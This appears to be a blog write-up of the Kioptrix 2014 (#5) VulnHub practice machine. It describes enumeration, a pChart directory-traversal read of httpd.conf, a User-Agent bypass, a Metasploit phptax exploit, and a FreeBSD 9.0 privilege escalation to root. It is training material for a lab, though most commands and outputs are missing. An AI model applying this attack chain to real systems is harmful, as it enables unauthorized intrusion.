AdSense

Thursday, June 7, 2018

Kioptrix - 2014 (#5)


KIOPTRIX- 2014 (#5) 

- Layout for this exercise:

1 - INTRODUCTION

The goal of this exercise is the study of the hacking process for the vulnerable machine Kioptrix 2014 (#5)

- Kioptrix 2014 (#5) can be downloaded from here:

 https://www.vulnhub.com/entry/kioptrix-2014-5,62/

- Once downloaded, extracted and opened with WMware:




2 - ENUMERATION

- First, using netdiscover let's notice that the only IP address in the local network working with WMware is 192.168.1.159, so it should correspond to the vulnerable machine Kioptrix:
- Scanning with Nmap, there are only two open ports (80 and 8080), running Apache web server.


- Also, it is interesting that the operating system is FreeBSD 7.0|8.0|9.0

 - Using dirb to check the contents of the website:
- Trying to connect to the web server to port 8080, there is a Forbidden message as answer:



 Trying to connect to the web server to port 8080, It works !


- Viewing the Page Source, we detect the presence of pChart2.1.3:




- pChart is a PHP library that helps to create anti-aliased charts or pictures directly from the web server.

 http://www.pchart.net/
- Going deeper into folder pChart2.1.3:






 - For instance, connecting to folder /examples:




3 - EXPLOITATION

 - First, let's see if there is any pChart 2.1.3 related vulnerability:


- It seems that there are a numbers of vulnerabilities affecting the /examples folder:



- Let's focus our attention on the Directory Traversal attack:



- Crafting the Directory Traversal URL to our needs:


- The attack is successful:


- At this point let's remember (from Namp) that we are dealing with FreeBSD 7.0|8.0|9.0 operating system and Apache 2.2.21 web server. 

 - The configuration file for this type of operating system and web server can be found at /usr/local/etc/apache22/httpd.conf:
https://www.freebsd.org/doc/handbook/network-apache.html
- Now, let's craft the URL to see what we can learn from httpd.conf:


- The Directory Traversal attack is again successful:



- Let's notice the last part of the output, where it seems that for successfully connecting to the port 8080 the User-Agent must be mandatory Mozilla/4.0

 - Connecting to 192.168.1.159:8080 with curl and specifying "User-Agent:Mozilla/4.0" the element phptax appears:
- phptax is an old web application to calculate US income return.

 - Now, we must change the default Mozilla version to the needed 4.0. For that purpose, opening about:config and accepting the risk:

- Searching for useragent and opening a new String:


- Writing a new string and its value:





- Now, the connection to 192.168.1.159:8080 is successful and phptax is indexed:





- Metasploit helps to exploit phptax:
- Setting options:


- Running the exploit a limited shell is achieved for user www:
4 - PRIVILEGE ESCALATION

 - Getting an sh shell:

- Remembering that the operating system is FreeBSD 9.0:


- Googling for FreeBSD 9.0 vulnerabilities:


- There is an interesting one for Privilege Escalation:

- Downloading the exploit and copying to a working directory:


- Setting a netcat listening session with the purpose of transferring the exploit to the victim machine:


- Doing the same thing at the victim's side (/tmp is writeable) the transfer is finally successful:




- Listing the exploit:

- Compiling:



- Running the exploit a root shell is achieved:




5 - CAPTURING THE FLAG

- Going to the /root folder:

etc ...




Posted by at
Labels: